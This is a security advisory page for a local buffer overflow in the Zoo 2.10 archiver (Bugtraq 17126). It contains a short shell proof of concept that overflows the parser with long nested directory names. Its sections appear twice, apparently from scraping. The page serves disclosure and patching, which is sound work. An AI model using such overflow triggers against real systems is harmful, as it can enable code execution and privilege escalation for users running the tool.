Zoo Parse.c Local Buffer Overflow Vulnerability
BID:17126
Info
Zoo Parse.c Local Buffer Overflow Vulnerability
| Bugtraq ID: | 17126 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Mar 16 2006 12:00AM |
| Updated: | Mar 17 2006 09:55PM |
| Credit: | Josh Bressers is credited with the discovery of this vulnerability. |
| Vulnerable: |
Zoo Zoo 2.10 Gentoo Linux |
| Not Vulnerable: | |
Discussion
Zoo Parse.c Local Buffer Overflow Vulnerability
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
Exploit / POC
Zoo Parse.c Local Buffer Overflow Vulnerability
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
The following example may be used to trigger this issue:
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
The following example may be used to trigger this issue:
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`
Solution / Fix
Zoo Parse.c Local Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
Please see the referenced vendor advisories for more information and fixes.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
Please see the referenced vendor advisories for more information and fixes.
References
Zoo Parse.c Local Buffer Overflow Vulnerability
References:
References:
- Bugzilla Bug 183426 �?? Buffer overflow during archive creation (Josh Bressers)
- Homepage (Zoom)